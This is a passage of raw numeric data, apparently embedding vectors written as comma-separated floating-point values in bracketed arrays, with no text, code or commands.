01251787,-0.025378004,0.01380127,-0.02050653,0.005861543,0.023552388,-0.012184613,-0.018142037,0.02163417,0.004721638,0.017137075,-0.023948593,-0.0112477485,-0.046903525,-0.016646031,-0.07451427,0.028605554,0.025375918,0.0050210496,0.040005594,0.0047961758,-0.012199331,0.0066162976,0.017356312,-0.014377642,-0.00029016673,-0.007193379,-0.014866981,0.009706365,-0.0128594125,0.025648028,-0.02094148,-0.0028384258,-0.023269892,-0.0089427335,-0.016279453,0.0011688983,-0.0050454433,-0.014108539,-0.0024666763,0.006426008,0.0031649226,-0.0034859697,-0.0009889922,0.01467985,-0.015011504,-0.0059896153,-0.0064139892,0.014467185,0.0034914317,0.0064831176,0.008105468,0.002630475,-0.015839102,-0.005253687,0.0010957614,-0.006698709,-0.0058433027,-0.003768481,-0.014699891,0.0033737102,0.00043879886,-0.0068462077,0.0009063467,0.0018729125,0.0043801954,-0.0054421113,0.0031437578,-0.00754626,0.010301506,-0.01465831,0.0073116138,0.0063117333,-0.008935848,0.027824745,0.01536058,-0.010767986,0.01289942,-0.009269497,-0.0037729703,-0.008388727,0.015230593,0.018952578,0.018153623,-0.008228664,0.0067389975,0.003325532,-0.0029713204,0.0071823117,0.0024458051,-0.020998005,-0.009839954,0.005706755,-0.0019113458,0.012067848,-0.0052272677,-0.00036976472,0.0063879206,-0.026138553,-0.00020687933,0.005608824,0.018221745,-0.0077759237,0.019849036,0.00269029,0.048612732,-0.015982142,-0.012363186,0.0088692615,-0.025608398,0.0013783227,0.023696369,0.0110562695,0.021598106,-0.0042257537,0.017218772,-0.015374864,-0.010201342,-0.0023210216,0.010890474,0.0041201026,-0.026040975,0.017960683,0.0015767942,0.0014034107,-0.011552263,0.017980186,0.00020905539,0.0055083837,0.0058092005,0.0006617787,-0.023664804,-0.009887391,0.0046811486,0.0066159433,-0.016972983,0.030066984,-0.020563474,0.008017014,0.00024813155,0.013500457,0.016794737,-0.01369089,-0.0074740755,-0.017166132,-0.011157853,-0.029124722,-0.005391205,-0.017912764,-0.014946582,0.0028250609,-0.012555383,0.012257694,-0.040075853,0.024437051,0.013456814,0.004306295,0.01605998,0.0028732496,-0.018217828,-0.0032472948,-0.016738629,-0.0061234287,0.0048076143,-0.0115210675,0.008202357,0.011264716,0.005769809,-0.016353508,-0.004509661,0.0013286402,0.003879981,-0.010344793,-0.0040207766,0.03240381,-0.0073656314,0.0060750176,0.004318907,-0.021959482,0.040737126,0.015951961,-0.005378707,0.0059812884,0.011398613,-0.0052233245,-0.008935697,-0.034530852,0.034921203,-0.03505981,-0.02069257,-0.0074479803,0.00024614975,0.013071352,-0.01684122,0.011755452,-0.01617917,-0.011502357,-0.0069643985,-0.006949864,0.0035751981,0.0035230555,-0.011535942,-0.0073119598,-0.038163677,-0.017641325,0.009506775,-0.016516581,-0.021007003,-0.000008843922,-0.006146202,-0.0036379597,0.01313329,0.008471382,0.00627468,0.0093866745,0.004403145,-0.0015620602,-0.0051121144,0.020068528,-0.014580499,-0.022236409,0.014978869,0.0123696355,-0.02147035,-0.006759482,-0.0038538673,0.03619763,0.007875056,0.00917114,0.007195137,-0.009133438,-0.004828922,0.012266176,-0.0021902684,-0.02321533,0.0061084037,-0.002910408,0.0033663795,0.015761996,0.0036157747,-0.03622322,-0.012020943,0.0051843156,-0.023226986,-0.0302804,-0.015726082,-0.012717616,0.019754548,0.007941736,-0.023115916,0.020119771,0.0192282,-0.018416597,0.0135443015,0.00982042,-0.01361049,0.032019556,-0.023550075,-0.009872542,-0.00085581036,-0.0027574454,0.013939614,-0.016784845,0.029828113,0.02116839,-0.0047134417,0.0041856114,0.009761736,-0.011034616,-0.0022462565,-0.00035783765,-0.023625424,-0.0040205894,-0.0042838543,0.004724987,-0.004276551,0.0016866078,0.0045360015,0.051350363,-0.043647256,-0.008789024,0.03416231,0.013959713,-0.036999263,0.020188149,0.004441514,-0.023967277,-0.020938514,0.01830378,0.0034845811,-0.003939129,-0.03654213,-0.011985543,0.008601158,0.0036431623,-0.0023548775,0.0127781965,-0.0028138217,-0.0051625017,0.015194316,0.0043544024,0.0011757918,-0.0024467553,-0.00836089,-0.004915706,-0.032120608,0.010454428,0.0070126443,-0.008621977,0.009461748,0.013577413,-0.021665856,0.0043326947,0.020941574,-0.0045040604,0.02017156,0.0023436002,-0.003938535,-0.016359309,-0.0068459925,-0.00021522482,0.001164817,-0.010845562,-0.008759754,-0.008173753,0.008769852,-0.00056040916,0.1329831,-0.009678455,-0.010621256,0.023104614,-0.008080757,0.00032953892,0.025461368,0.021625934,0.02092827,0.008029384,0.014554154,-0.021039603,0.005581934,0.023347678,0.006959705,0.0038762907,0.0016772822,0.1303144,0.0035390358,0.024086816,0.023892902,0.012516542,0.00445865,0.0074872905,0.0012526521,-0.07013686,-0.004579353,-0.050108213,-0.003857009,0.0032864814,-0.02846835,0.011059227,0.00788148,-0.005432514,-0.005365086,0.014046502,-0.0020364223,-0.005877586,-0.012200289,-0.02504945,0.0055265534,-0.003439801,-0.010245663,0.0015369044,-0.026097598,0.013318455,-0.041755725,0.011829215,0.005575364,0.021636693,0.002595478,-0.005924593,0.026585206,-0.004409974,-0.006114339,0.0020931987,0.0011863933,0.016001694,-0.019021818,-0.02130273,-0.01105124,0.01897445,0.016287671,0.03317024,-0.011359976,-0.009263346,-0.007514216,0.0069353646,0.016179755,0.011061362,0.02855348,0.021435387,-0.02214242,-0.028980266,0.03369848,-0.0029100338,-0.0026185806,-0.013535418,-0.0061912606,-0.009855694,0.03180505,0.008085188,-0.0001567409,0.019677054,0.014117793,0.030566258,-0.0007384784,0.018261788,0.016638037,-0.017569272,0.0034387368,0.0032369785,-0.008514705,0.00052637514,0.0053533246,0.03419406,-0.008918933,0.006739644,0.005051881,-0.007673138,-0.020208275,0.024456078,-0.025428327,0.018696344,-0.0057014194,0.008548529,-0.01689088,-0.041269228,0.001115573,0.014365804,0.014359842,0.00400416,-0.015658878,0.006675161,0.0074748583,-0.0015182304,-0.010187197,-0.0035384148,-0.046939075,-0.029987913,0.011288382,0.0010301855,-0.0010102346,0.0042138807,-0.033971097,0.004996514,0.004808207,0.01351878,-0.008941159,0.0058405017,-0.026182096,-0.0091883205,0.009500614,0.03296555,-0.0042266157,-0.022178872,0.0051792488,-0.025406929,-0.026218103,-0.009879722,-0.016613413,-0.000093666524,0.021919305,-0.011163506,0.0002590842,-0.0087800305,0.013450851,-0.013516247],[-0.01746213,0.0046043703,-0.009707742,0.008298918,-0.008888964,-0.016680278,-0.014566266,0.028187081,-0.028564606,-0.016675476,0.0019143173,0.012407174,-0.002327365,-0.004408764,-0.020409867,-0.009791055,0.016939586,-0.0012640663,0.009032704,-0.0038557316,0.024477769,0.0013771035,0.008182896,0.009226677,0.009162813,0.006144616,-0.008942281,0.0017506469,0.0018938158,0.01662446,-0.0129053425,0.032850545,0.0077872192,-0.0069808797,-0.0064216196,-0.01601798,-0.00558714,-0.025707075,0.002310219,-0.012756562,-0.0030934168,0.00660373,-0.004445242,0.014028318,-0.0044401074,-0.008491097,-0.016728448,0.016310763,-0.010870358,0.008261917,0.010443862,0.013349565,-0.015659867,-0.002334351,-0.013883069,0.013427827,-0.0040215016,-0.022727132,0.00669265,0.009440637,-0.0008642526,0.0032618877,0.0049429745,-0.014057598,0.010093015,-0.0035878764,0.008812994,0.0007196265,0.01742517,-0.034657694,-0.0111821825,-0.018897103,0.0031255202,0.00003340799,0.010970505,0.012430631,0.014732182,0.002821839,-0.028294934,-0.00659274,-0.008616812,0.024019692,-0.008694301,-0.007346712,-0.002404065,-0.0031762947,-0.025167488,0.007588823,-0.017925512,-0.038098272,-0.0036872246,0.0031119257,0.012083356,0.01768776,-0.022730997,0.0008879938,0.022858072,-0.0075687715,0.0041158916,0.034173016,-0.015327501,-0.021179495,-0.027784709,0.012838663,0.019053405,-0.025254004,-0.010024133,-0.005721662,-0.0073146247,-0.015467985,0.013547977,-0.00049483427,0.019978004,0.017756226,0.017375654,-0.032897796,0.0008726546,0.0066329893,0.007701439,0.0009879178,-0.010205812,0.018561782,0.008672622,-0.014967045,0.008529551,-0.00063301343,-0.0024837782,0.005580063,0.007539371,0.010384587,0.0118654305,-0.0015273654,-0.0019195062,-0.009266738,-0.019235255,0.0018215572,0.008086636,-0.009666214,0.0132093,-0.009335887,0.0062477784,-0.011489425,-0.014248731,0.004042982,0.027845217,0.018645138,-0.008623631,0.022234986,0.014403044,-0.0072307666,0.00285703,0.0035875752,-0.012585394,-0.024297992,0.0024583226,0.03705312,0.009401284,-0.02068472,-0.023778927,-0.008373098,-0.02670667,0.014308174,0.015395059,-0.022685917,-0.020264091,-0.041385185,0.0012284318,-0.0034202721,-0.024309684,0.016212644,0.020303724,0.0060264054,0.011276261,-0.009228501,-0.006820132,0.024763906,-0.004970936,-0.00007510105,0.009516452,0.0048848446,0.011394254,-0.004366641,-0.000992658,0.010971742,-0.001353572,0.022029001,0.026445275,-0.017027682,-0.019223638,-0.006810826,0.0100986315,-0.042405233,-0.009462922,-0.010179993,-0.01091727,-0.018477252,-0.00049287494,0.08247095,-0.0048684985,0.00986469,-0.009932062,0.015737467,0.005006438,-0.02928487,-0.027259035,-0.018873604,-0.0073431996,-0.0143814655,0.020002533,-0.016715746,0.021462569,0.0053114886,0.0014137451,-0.008902361,0.026284067,-0.06508817,0.021406945,0.026928714,0.027222104,-0.0013840271,-0.018328322,0.0050125024,0.009743797,-0.02712106,0.0004373881,-0.031465597,-0.008849691,-0.0011122086,0.027463038,-0.022847367,0.007707438,0.008277045,-0.022610644,-0.017273797,0.007982296,-0.013618306,0.006220877,-0.0046018395,0.005274707,-0.0024085057,0.0025198315,0.015342479,0.036291275,0.032498036,0.003260855,-0.00016546105,0.013145633,0.011263934,-0.015035337,0.01902299,0.03715086,-0.004003561,0.019577673,0.013462843,-0.0018511903,-0.025297234,-0.028650353,-0.0058661057,-0.0013210396,-0.004057033,0.029259507,0.023279388,0.0034744884,0.012083465,0.03497507,-0.01171599,0.021104295,-0.029741202,-0.013599935,-0.018702056,0.0012250475,-0.009303373,-0.013580961,-0.008970715,-0.007876311,-0.009990155,0.014593859,0.012974171,-0.0002587121,-0.01200397,-0.00014232828,0.0017921798,0.00075323303,-0.012352983,-0.01994431,0.0016952346,-0.029151632,0.018910958,0.026740344,-0.015418998,0.014413001,-0.011292984,0.0044613387,-0.0067993472,-0.009606706,-0.025830356,-0.020390635,0.008066986,0.0077202814,-0.037015535,0.006348573,-0.01439187,0.026891865,0.0141864205,-0.0009409656,0.00088085583,-0.01626806,0.037456613,-0.025796149,0.020557461,-0.029754715,-0.009158913,-0.024502283,-0.029155433,0.006199778,-0.013002098,-0.020165052,-0.012512597,-0.015835892,0.011918112,0.020636514,-0.030572578,0.005949759,-0.038562376,-0.02760522,0.011166748,0.0006399176,-0.0074409414,0.0063434825,0.0036949823,0.009175441,0.015652243,0.023819674,0.021821951,-0.019114383,0.04143418,-0.01295858,0.01469968,-0.0009956736,0.018875334,-0.029837374,-0.006717551,-0.010518855,0.019440563,-0.0111232065,-0.018789107,-0.012205323,0.007059108,0.015293397,-0.015308063,0.01722878,0.012073784,-0.0014701079,-0.017851723,-0.020801572,-0.0030102665,-0.0015604125,-0.0043928344,0.0038550003,-0.014425702,0.00715064,0.011107215,-0.016047228,0.0041065076,0.068169564,-0.011492718,-0.005746078,-0.010131322,-0.020096572,-0.010396259,0.02118991,0.018117527,-0.011339953,-0.0052553467,-0.01657335,-0.024530599,0.010246608,-0.0020511807,-0.030796854,0.012071501,-0.012942206,-0.02264121,-0.015631884,-0.0066284062,0.01669999,-0.012224048,-0.00066831906,0.03256434,0.012456637,0.013526248,-0.02035218,-0.0070692077,0.012750308,-0.0058815884,-0.012600849,-0.007018446,-0.0023237998,0.011225537,-0.038961753,0.029934503,0.02443569,-0.0014897707,-0.0042305123,-0.016568713,-0.00374881,0.0020393839,-0.01450801,-0.008145861,-0.010872398,0.018835764,-0.011127883,-0.010471313,-0.021683555,-0.00045050742,-0.012505002,0.028562525,-0.01956791,0.0055157556,0.023835475,0.012314593,0.014311491,-0.042413324,0.03515634,0.025458606,0.02092566,0.006133092,0.0015887247,-0.009283099,-0.0072988505,0.020941764,-0.02604397,-0.0073684584,-0.0030172158,-0.011914708,-0.0028645,0.014922282,-0.016223155,0.010736015,0.004136799,0.016618554,-0.0026312217,-0.00023226139,0.006144595,0.0017313788,-0.010780719,0.0077650384,0.009097638,-0.008692393,-0.013583194,0.007432701,0.003274545,-0.0037280486,0.0057926103,0.008394313,0.0056375344,0.023354515,-0.019362887,0.023980187,0.02978525,0.019731386,-0.0025262353,0.014228871,-0.020006174,-0.0018911693,0.014828707,-0.03820727,-0.018863408,0.015295647,-0.001201089,0.0029319085,-0.0024594492,-0.0021349748,0.0020672597,0.030092947,-0.0044840737,0.009900692,0.012944354,-0.016802425,-0.003970638,-0.0072718253,0.0070959125,-0.015502976,-0.010447992,-0.006700487,0.01665152,0.009895619,0.004243853,0.033476274,0.00047642586,0.01845934,-0.00018702216,0.00034288576,-0.0023160172,0.02534639,0.0014374398,0.019146174,0.0141972825,-0.0420632,0.017070761,0.0057251467,-0.013586718,-0.022687187,0.011222618,0.023958543,0.021601055,0.013796225,0.025241114,-0.013604544,0.008420804,0.012543448,0.026473382,0.0033604666,-0.039331187,-0.004276259,0.001594172,0.00045102317,-0.006814418,-0.022518516,0.0044856234,-0.0005093829,0.0365343,-0.026471388,0.016690454,0.013187428,0.0034965007,-0.015977204,-0.007843806,0.009914494,-0.0061487122,0.03370053,0.030194584,0.032558523,-0.011157672,-0.01513361,0.0053850915,0.010156389,0.015848072,-0.006265766,0.015298678,-0.026862893,0.0037601402,0.014731445,0.025267038,0.012154448,0.0032202662,-0.025053574,-0.011967559,-0.013644509,-0.007145286,-0.0057749483,-0.0011535283,-0.00025174342,-0.0037952408,-0.017968165,-0.019149711,-0.012829178,0.011356057,0.029273266,-0.0028534853,-0.022635128,-0.0025951504,-0.011471551,-0.010268216,0.0066186194,-0.0019006563,0.0020927098,0.005207252,0.0018718219,-0.008152063,-0.021747468,0.02184295,-0.0022709125,0.0070766644,0.003737069,0.016001584,0.022762533,-0.020149728,0.014091565,-0.007454715,0.0142354155,-0.015524959,-0.006174794,0.020692134,0.011705363,0.0026781452,-0.02091426,0.008837625,-0.016828204,0.0053408397,-0.014912012,0.016699182,-0.018729882,-0.01092792,-0.034647435,-0.019979049,-0.0046921703,-0.00391384,-0.0150823,0.020526977,-0.007839588,-0.010900084,0.00333983,-0.0043055774,-0.023299137,-0.011246132,0.032913852,0.0011375676,-0.0115659945,0.01117687,-0.0017702847,-0.010870332,-0.009678858,0.014311869,-0.014249761,0.0039982386,0.020865163,0.011908175,-0.016339866,-0.011537591,-0.0026235601,0.009140932,0.0020880427,-0.038433302,0.012101101,-0.0025677893,0.016872894,-0.001199222,-0.013716393,-0.027690839,-0.0028919524,0.017135048,-0.02572342,0.0017736163,-0.013234042,0.01712905,-0.0201772,-0.00034054447,0.019002624,0.011486136,0.0035627952,-0.020125378,0.019770699,-0.048519343,-0.0065864255,0.00874126,0.024799192,0.007972519,0.02762358,0.032668985,-0.004506069,0.0074580912,0.00007937518,-0.013811188,0.0038662357,-0.023314117,0.01513114,-0.011803946,-0.015976382,-0.033095006,-0.010746707,-0.009773815,-0.05257772,-0.019881109,0.037163872,0.016879177,-0.00004968625,-0.0004487479,-0.009824387,0.0010967442,-0.0026056634,-0.0036430524,-0.049962126,-0.013583293,0.0056726635,-0.0067057223,0.019196507,0.0059456327,0.004964627,-0.0068359887,-0.020795928,-0.012659577,0.0040060803,0.012784244,-0.017521564,0.0011107374,0.013127769,-0.03601961,0.01848892,-0.040467042,0.020009946,0.001853715,0.0296959,0.024571588,0.020396,0.009679042,0.014103071,-0.012074877,0.014291406,0.0070972857,0.011235566,0.012611695,0.0018819532,0.007988115,0.02051005,-0.003928994,-0.0117963115,0.0008159254,0.02291876,0.039310265,0.0015772769,0.031044843,0.00408335,0.011009129,0.0038897411,0.0021866518,-0.011191784,0.012276638,0.016415522,0.0123927705,0.013245579,0.0044493186,0.0068705496,-0.027366996,-0.011430173,-0.010901653,0.02485556,0.030873971,0.009434291,-0.0064592524,0.007214568,0.019028755,0.007891903,-0.012681774,-0.014903736,-0.0005483813,-0.02394418,-0.006374832,-0.0323082,-0.006491851,-0.030564493,-0.0081573585,0.011675928,0.012473145,-0.010666943,0.011767205,-0.0016719254,0.025149098,-0.0016624648,-0.029852716,-0.021507986,-0.0018051729,0.014266917,-0.014703746,-0.0017771197,0.014263066,0.009470622,0.0074901814,0.02354028,-0.032348722,-0.00016517437,-0.01208636,-0.0146457935,0.0073350286,0.016341468,0.020045476,-0.011985937,-0.021127716,-0.011940224,-0.008199429,-0.0055654254,-0.009022232,-0.0008904775,0.0047846413,-0.00142661,0.008877973,-0.0052065062,-0.013978523,-0.00037778978,0.014401384,-0.042249005,-0.020903412,0.017617002,0.00057366805,-0.042228516,0.0067847106,-0.012738388,0.02750814,0.035387468,-0.021052808,0.008893575,-0.01356526,0.0029865159,0.02486758,0.03357375,0.0077738077,-0.027438164,-0.029750759,-0.0065742154,-0.034997378,0.0018066908,-0.0051290924,-0.014184367,-0.025973013,-0.03737909,-0.0025584293,-0.03291329,0.009245961,0.0014840811,-0.027102597,0.037172876,-0.025545776,0.014189763,0.019187717,-0.00018835683,0.027223296,-0.0015578122,-0.0058171507,-0.054040063,-0.021229029,0.015773276,-0.014256171,0.0061168964,0.0061963308,-0.025742833,-0.018242393,-0.030881157,0.01725526,-0.024484951,0.02154507,0.0014190868,-0.003465171,-0.00862769,0.025001418,-0.019374166,0.02115305,-0.02051622,-0.01575594,-0.002309357,0.0025558677,0.0036672356,0.010059589,-0.032819986,0.02618882,0.01292565,-0.022347296,0.014107373,0.0062431456,0.0077737235,-0.0026541967,0.014054266,0.0062680035,-0.011721547,0.031687595,-0.0084244665,-0.005635962,0.03151935,0.0010778514,0.0071809446,-0.012363049,-0.01594395,-0.02221197,-0.022632265,0.0010354267,-0.0064738253,0.014753351,0.009877082,0.00060520566,0.002406321,0.0016664009,0.03440152,-0.004617447,-0.0055901376,0.019145768,0.0029455707,-0.037478685,-0.007897442,-0.0004711569,-0.0061516874,-0.012333121,0.020528048,-0.008194478,0.004256584,0.022778453,-0.0135106575,-0.016362926,0.026342783,-0.012024746,0.008752737,0.01096047,0.013317791,-0.00072480255,0.008876928,0.01850877,-0.024264777,-0.0032841396,-0.02328958,-0.024552124,0.018049499,-0.02617716,-0.0068073208,0.0051562777,0.0030096073,0.00985384,-0.0042969356,0.013382755,-0.023237979,0.006449197,0.0012944442,0.01384658,0.018947894,-0.005199955,-0.02033986,0.0061930753,-0.000045775512,-0.014218463,0.010213709,-0.0017256498,-0.017569501,0.01575869,0.0026489312,-0.012277127,-0.011589759,-0.025735294,-0.0012746439,0.025514971,-0.0066040293,0.018371731,-0.018455239,0.0022993558,-0.0023899574,0.0009833166,-0.018352868,-0.010495908,-0.009758745,0.025833532,-0.016686771,-0.0073037157,-0.00077718624,-0.06624044,0.00086144445,-0.009594733,-0.02093308,0.021237027,-0.0007232064,0.010114708,0.017179048,0.03877266,-0.030514495,-0.014359458,-0.012738541,0.01843542,-0.0036822287,0.0062120403,-0.017219134,-0.015514663,0.0040063793,0.02258733,0.015870688,-0.02050268,-0.007597707,0.015225723,0.00008482767,0.035703894,0.011767737,-0.008485932,-0.01988029,-0.022426227,0.0101544885,0.0058559836,0.02169943,-0.008316538,-0.020709658,-0.020665413,-0.0011892535,0.0033115125,-0.0044270074,-0.0050281724,-0.013413781,0.0013611668,-0.018481562,0.010832419,0.022857388,0.0034159315,-0.022218326,0.0072779064,-0.0026878612,0.006814314,0.0008073101,0.020126848,-0.0030101694,-0.014988983,0.019397086,-0.021754079,0.028647905,-0.009686235,0.0190804,0.016649865,0.0025757265,-0.0030179322,-0.0029503559,0.026816398,0.030086732,-0.023004122,-0.019618606,-0.0024844357,0.03611221,-0.0052696443,-0.018401515,-0.021612413,-0.004057325,-0.011079837,-0.010770355,-0.023133999,0.012192325,-0.0020738507,0.0068351165,-0.0013115512,-0.028812153,-0.0041978476,0.029048223,-0.015121863,-0.013929313,-0.02208795,-0.033220395,0.0122575965,0.006290559,-0.0008376455,0.008128834,-0.0012735194,-0.01830597,0.019621493,0.0327324,0.0032274362,0.028401947,0.009956627,-0.0070685307,0.0046951575,-0.008142781,0.024544187,0.0029835803,-0.0066264463,0.052544385,0.007064473,0.0013610602,0.014860501,0.009750011,0.018217256,0.023671526,-0.012566761,0.004995149,0.003923441,0.00885101,0.010825749,0.0112156905,-0.0011520218,0.024415694,0.0044474304,0.026236761,-0.0024492468,-0.016804378,0.02297643,-0.0028072654,0.013687815,-0.0067545986,0.0050890013,-0.0067636413,-0.007377009,-0.0063072396,-0.00092533324,0.0040324638,-0.0017432454,-0.0072668195,0.01809866,0.008900933,-0.0025693795,-0.029712152,-0.007970282,-0.00039533668,0.0019806086,-0.009601894,-0.0116994865,0.004317722,0.03090218,-0.025275612,0.0026095293,-0.0017655996,-0.004699671,-0.006016723,-0.00042996564,0.022212295,0.00016068673,-0.0013811751,-0.015877968,-0.0015247774,0.0011131895,-0.0011710481,0.00553285,-0.0060174693,-0.00778936,-0.011131976,-0.008697442,0.010174468,-0.04719574,0.013156385,-0.017383592,0.004190841,-0.01814794,-0.025482515,0.00442463,0.003340418,-0.012912209,0.034511536,0.0016096508,-0.023721166,0.040853888,0.019327316,-0.026673684,0.015214887,0.02023592,0.027732568,-0.010924945,-0.008135714,0.017923923,-0.0069986726,-0.01439357,-0.021887315,0.0034161815,-0.013173393,-0.01997042,-0.0065057254,-0.0031544603,-0.018888634,-0.0144129535,0.032179195,-0.026724666,0.026902026,0.021135848,-0.011057308,-0.008076713,0.025277376,-0.004314005,0.018568676,-0.013887343,0.025708746,-0.000635394,-0.04041946,-0.008367781,-0.015908629,-0.010098903,-0.0056265835,0.0006517385,-0.0095957145,-0.012214095,-0.000009464759,-0.017920544,0.0045137117,0.0025210744,-0.028563134,0.004221356,0.02683405,0.015881019,0.0054909177,-0.014498942,-0.012511084,0.0031940117,0.027238876,-0.007456354,0.0060354443,0.020819485,-0.01388336,0.0019362543,0.015812423,-0.030084405,-0.010744426,-0.0027921814,0.006559313,-0.023291804,-0.007906865,0.0066648806,0.006233489,0.024887426,-0.0062568206,-0.007155612,0.026851725,0.018150773,-0.0060767564,0.009939443,0.014994764,0.008052243,-0.012275721,0.0026403724,-0.0023811946,0.0038659319,0.0044157584,-0.011270675,-0.012102683,-0.011104245,0.006920631,-0.011207513,0.0008318275,-0.011435477,-0.00760635,-0.0038201232,0.0027036264,0.0050172885,0.011211283,0.03163841,0.0076746065,-0.018187342,0.0049886187,-0.007473888,0.021117022,0.012512184,0.008221409,-0.01274461,-0.0060185874,0.013863662,0.005465541,-0.0037364597,-0.0069294637,-0.0005421309,-0.018765109,0.00040024277,0.020609323,-0.012337493,-0.014071364,-0.0032555042,0.0049205213,-0.02509229,-0.030599345,0.0031871272,0.0060281334,0.0009038002,0.008015716,-0.02629215,0.008738708,-0.016322033,0.008687216,0.08803782,-0.0047130147,0.011223581,0.0045859264,0.016079167,-0.03693554,0.0019260311,0.0002597751,-0.0009899538,-0.010114504,-0.022189328,-0.014149613,-0.00264998,-0.0023590582,0.0086664,-0.019399608,-0.005307949,0.021278562,0.015155301,0.005213747,0.0059500267,0.010265191,0.007551716,-0.008481574,0.015448893,0.020443872,0.03190108,-0.012439144,0.009889847,0.009429016,0.010959153,-0.014532976,0.02594923,0.024819868,-0.029010901,0.0043498883,-0.0018723418,-0.009580672,-0.013072816,0.020089336,0.0074936887,-0.003168974,0.033854287,0.008965064,-0.0027159802,-0.02165941,-0.015102319,-0.00608744,-0.0040027862,-0.0118358815,0.0018394946,0.00032363238,-0.0066041755,0.014552003,-0.009277518,0.010079765,-0.010232715,0.015429992,0.017944492,-0.008087787,0.007494428,0.026869597,0.003913755,-0.013236271,-0.008396281,0.017772587,-0.010840467,-0.010662982,0.033884265,-0.019519852,0.0014548587,0.005009959,-0.010494082,0.023809226,-0.014503482,0.004213305,0.0116145145,-0.009374449,-0.008797915,-0.036319934,-0.015407707,-0.009991882,0.01600667,0.01783314,-0.0079280725,-0.0042952574,-0.008141763,-0.0005394621,0.05377892,0.012238868,0.007887566,-0.0064749545,-0.0010158743,0.026307136,0.01585698,0.024409164,-0.008715844,-0.0036466378,-0.0056164963,0.021181466,0.007108431,-0.0012363816,0.01938478,-0.010962313,0.010737271,-0.01117963,-0.0043662884,-0.026614122,0.0006358433,0.04745996,0.018989397,0.0040864632,-0.008075923,0.017926378,0.001121548,-0.010232814,0.0026663546,-0.0015337918,-0.015919749,0.004756095,0.015538844,0.004410964,-0.028925912,-0.057218418,-0.0024613172,0.1225222,-0.013744075,0.0032942395,0.012265702,0.0023240042,0.002982851,-0.121023625,0.007113644,0.00931769,0.0137418555,0.010781814,-0.015629398,-0.003507699,0.008508699,0.014790771,-0.024473583,-0.0016539005,-0.0059505966,0.024895174,-0.014661526,-0.0032746908,0.021799108,0.0007500242,0.004577836,-0.03077188,-0.0072763865,0.016609335,-0.0012088891,0.012068298,-0.0027274848,-0.0071959393,0.0051495843,0.013631825,-0.01995166,-0.020438096,0.007864395,0.031672027,-0.022392195,-0.038908962,-0.007817527,0.020906158,0.0043118657,-0.0077768355,-0.012286334,-0.1577898,0.01813484,0.0076188077,-0.035791382,0.016349763,-0.0093589155,-0.0032093371,0.0066990433,0.017378805,0.0006379128,0.0118146995,0.022346452,-0.01043169,-0.0048185308,-0.023284698,-0.0023055838,0.0031493674,0.0019241452,0.0020297104,0.0030393463,-0.0060817003,-0.000672133,-0.008636646,-0.013425875,-0.021688988,0.017785817,-0.014276307,0.025535945,0.005680041,0.00008069834,-0.0074569904,0.00034267845,-0.025363876,0.0059728175,0.00308956,-0.010927726,-0.0033353933,0.006573745,0.0038370923,0.02976542,-0.010630431,-0.005526153,-0.009365363,0.012611383,0.006801838,0.018717611,0.010781393,0.004395217,0.008958363,0.010555899,0.023163244,0.0084977215,-0.008450818,0.02553871,-0.0030847187,-0.005335503,0.0003092134,-0.01234547,-0.010090091,0.0012199599,-0.0052412827,-0.007028211,-0.023190362,-0.009955649,0.016147323,-0.012081872,-0.0005631572,-0.021322709,-0.0052095107,0.0033699325,-0.001717844,-0.0073259175,0.0016328606,-0.010415153,0.004657898,0.012428505,0.010327351,-0.0047276593,0.011254821,-0.010683906,0.018047351,-0.01942597,-0.0057350458,-0.042285256,0.0120310765,-0.029613921,-0.0034230785,-0.009191033,0.00024914075,-0.0046528913,0.026956348,-0.004775614,-0.0015276923,-0.005851859,0.024508573,-0.0019373699,0.033697914,-0.0023237157,-0.030254385,0.040991977,0.0079411045,-0.026895914,-0.006033891,0.014369649,-0.012894775,-0.0025826874,-0.0067269164,-0.0024728065,-0.024822487,-0.0009721678,-0.008728442,-0.010523189,0.02288253,-0.008783847,-0.03391794,-0.0043328204,0.011852934,-0.007295934,0.0032291154,-0.041052956,-0.026639152,0.012271251,-0.004808646,0.008258608,0.023462577,0.0021709215,-0.024189679,-0.0027343282,-0.016296024,0.019529145,-0.042508405,0.025091734,-0.004542718,0.0031635882,-0.019156018,-0.008931343,-0.012124246,0.02388966,-0.037660968,0.009189983,0.005175687,0.011238115,0.007044956,-0.015865957,0.01701441,-0.025395328,0.022674082,-0.016187368,0.02411105,-0.0020080227,-0.0003371245,0.013431243,-0.023958994,-0.0071558873,0.011383126,0.07206921,-0.0074218144,-0.0017063733,0.02145316,0.026462583,0.011353327,0.010364619,-0.017498948,-0.01688107,-0.01085575,-0.028640252,-0.021601403,0.00013366994,0.018178646,-0.018497417,-0.0077788094,0.010523038,0.0148322,0.0023049805,0.000022129423,0.019083789,-0.015318288,-0.0102752065,0.031097107,0.033408195,0.015830612,0.009463228,0.016381733,-0.0075019896,0.004547295,-0.015661066,-0.010228139,-0.0034432306,-0.0018046971,0.009030071,-0.038559657,-0.018493269,-0.017680045,0.0013827179,-0.01861184,-0.0035728314,0.007402203,0.011351798,-0.027692592,-0.00012562254,-0.02364875,0.006824641,0.008670149,-0.00328548,-0.010659805,0.0022939516,0.0042544412,0.004587558,-0.010009221,0.01580478,-0.003805001,-0.004898456,-0.009058908,-0.006096914,-0.005980777,0.03181765,0.002538068,-0.023170609,-0.011286586,-0.004238874,0.0006512859,0.0024718237,-0.015553146,-0.008196895,0.015014289,-0.0075639924,0.0022016896,-0.025344877,0.010773582,0.015442175,-0.020326195,-0.0024528182,-0.0047590774,-0.0023252834,0.032722626,0.021426791,0.02036639,-0.00060705584,0.001095651,0.0019250073,-0.019261487,-0.026504293,0.033122227,-0.02763026,-0.014139396,0.024827981,0.012347869,0.030346934,0.003184952,0.016776338,0.015691316,0.012740909,0.0034259774,0.013561151,-0.014799112,0.015828911,0.018795224,0.009616888,-0.0037745247,-0.01866295,-0.007041347,0.0069698337,0.012053131,0.022334889,0.0029929613,0.016145172,-0.0048082056,0.017845074,-0.025731692,-0.016234575,0.048369445,-0.012112479,0.008752613,0.01776914,0.012271998,-0.02682941,0.0051549063,0.012417157,-0.012593525,0.0030650347,-0.017426545,0.006665704,-0.0000337488,-0.026894042,0.016101388,-0.022124205,0.022389973,0.015848886,-0.018910605,-0.011049001,0.014787022,0.032696053,0.004998141,0.002093955,0.014154143,-0.017945651,-0.016228106,0.0005114395,0.0038902003,-0.017790593,0.0018795824,0.0018107347,-0.01893837,-0.021922396,0.010119483,-0.010712767,0.022884635,-0.0028528164,0.009763693,0.015407032,0.019571614,-0.004444551,-0.017125268,-0.0039043212,-0.00938192,0.024404777,0.031506415,-0.012328522,-0.011322996,-0.027566327,0.008045232,0.03278362,0.0028234157,0.02013985